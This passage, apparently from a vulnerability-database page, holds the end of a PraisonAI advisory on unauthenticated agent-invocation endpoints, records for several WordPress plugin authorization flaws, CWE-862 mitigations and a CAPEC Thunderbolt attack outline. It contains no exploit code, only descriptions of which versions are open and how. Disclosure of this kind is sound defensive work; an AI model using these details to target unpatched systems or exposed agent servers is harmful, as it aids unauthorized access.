approach:\n\n1. Add a shared authentication helper for all network-facing agent invocation servers.\n2. Make `AgentTeam.launch()` fail closed for non-loopback binds unless a token/API key is configured.\n3. Require `Authorization: Bearer \u003ctoken\u003e` or an explicit documented API-key header for `POST /{path}`, `GET /{path}/list`, and `POST /{path}/{agent_id}`.\n4. Default `AgentTeam.launch()` to `host=\"127.0.0.1\"` unless an explicit unsafe/remote option plus auth is configured.\n5. Add regression tests proving:\n   - no token returns `401`;\n   - wrong token returns `403`;\n   - correct token can list agents;\n   - correct token can invoke the team endpoint;\n   - correct token can invoke the per-agent endpoint;\n   - external bind without auth fails at startup.\n\nIf unauthenticated local development remains supported, require loopback binding and a loud explicit unsafe opt-out for externally bound unauthenticated servers.\n\n## Severity\n\nRecommended severity: Critical\n\nRationale:\n\n- Network attack vector: the documented server supports remote access via `0.0.0.0`.\n- Low complexity: a single POST request invokes the agent.\n- No privileges: no credentials are required.\n- No user interaction: once the server is exposed, the attacker directly sends requests.\n- High confidentiality/integrity/availability impact depends on deployed agents and connected tools, but this is the same agent-control class as prior PraisonAI unauthenticated API advisories. The official remote-agent documentation explicitly discusses remote agents with tools, memory, knowledge, and auth headers, so the security-relevant configuration is not hypothetical.\n\nIf maintainers want to score based only on minimal agents with no tools and no private context, the lower-bound impact would still include unauthorized remote invocation and model/API spend.\n\n## Notes\n\nThe direct single-agent `Agent.launch()` path in current source appears to share the same missing-auth design, but it raises `NameError: name \u0027_server_lock\u0027 is not defined` before serving in the tested local source checkout. This report therefore makes the primary impact claim only for the confirmed working `AgentTeam.launch()` / `Agents.launch()` path.\n\nThe CLI `praisonai serve agents` surface advertises a `--api-key` option and should be reviewed by maintainers when applying a shared fix, but this submission does not depend on a CLI-specific bypass claim.",
  "id": "GHSA-x8cv-xmq7-p8xp",
  "modified": "2026-06-18T13:57:32Z",
  "published": "2026-06-18T13:57:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x8cv-xmq7-p8xp"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI AgentTeam.launch exposes unauthenticated remote agent listing and invocation endpoints"
}

GHSA-X8F2-2F6R-99XX

Vulnerability from github – Published: 2026-07-10 18:32 – Updated: 2026-07-10 18:32
VLAI
Details

The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Arbitrary Post Creation and Stored Cross-Site Scripting in all versions up to, and including, 14.0.0 due to a leak of an API token and insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to create arbitrary posts, and, if the Advanced Custom Fields plugin is installed and activated, inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-1667"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-10T17:16:54Z",
    "severity": "HIGH"
  },
  "details": "The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Arbitrary Post Creation and Stored Cross-Site Scripting in all versions up to, and including, 14.0.0 due to a leak of an API token and insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to create arbitrary posts, and, if the Advanced Custom Fields plugin is installed and activated, inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
  "id": "GHSA-x8f2-2f6r-99xx",
  "modified": "2026-07-10T18:32:19Z",
  "published": "2026-07-10T18:32:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1667"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset?reponame=\u0026new=3586051%40squirrly-seo\u0026old=3474256%40squirrly-seo"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aebdd464-10b9-4d43-bf38-f0e8ae25625f?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X8FC-W2Q6-X22J

Vulnerability from github – Published: 2026-03-25 18:31 – Updated: 2026-03-26 21:31
VLAI
Details

Missing Authorization vulnerability in weDevs WP User Frontend wp-user-frontend allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP User Frontend: from n/a through <= 4.2.8.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-32485"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-25T17:16:59Z",
    "severity": "HIGH"
  },
  "details": "Missing Authorization vulnerability in weDevs WP User Frontend wp-user-frontend allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP User Frontend: from n/a through \u003c= 4.2.8.",
  "id": "GHSA-x8fc-w2q6-x22j",
  "modified": "2026-03-26T21:31:25Z",
  "published": "2026-03-25T18:31:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32485"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/wp-user-frontend/vulnerability/wordpress-wp-user-frontend-plugin-4-2-8-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X8H5-V9C3-M475

Vulnerability from github – Published: 2025-01-09 12:30 – Updated: 2025-01-09 12:30
VLAI
Details

The GS Insever Portfolio plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_settings() function in all versions up to, and including, 1.4.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's CSS settings.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-12249"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-09T11:15:12Z",
    "severity": "MODERATE"
  },
  "details": "The GS Insever Portfolio plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_settings() function in all versions up to, and including, 1.4.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin\u0027s CSS settings.",
  "id": "GHSA-x8h5-v9c3-m475",
  "modified": "2025-01-09T12:30:55Z",
  "published": "2025-01-09T12:30:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12249"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/gs-instagram-portfolio/tags/1.4.5/admin/Backend_Builder.php"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/gs-instagram-portfolio/tags/1.4.5/admin/includes/Ajax.php"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/36f3e9be-9a4e-458d-92b3-687afc44696a?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.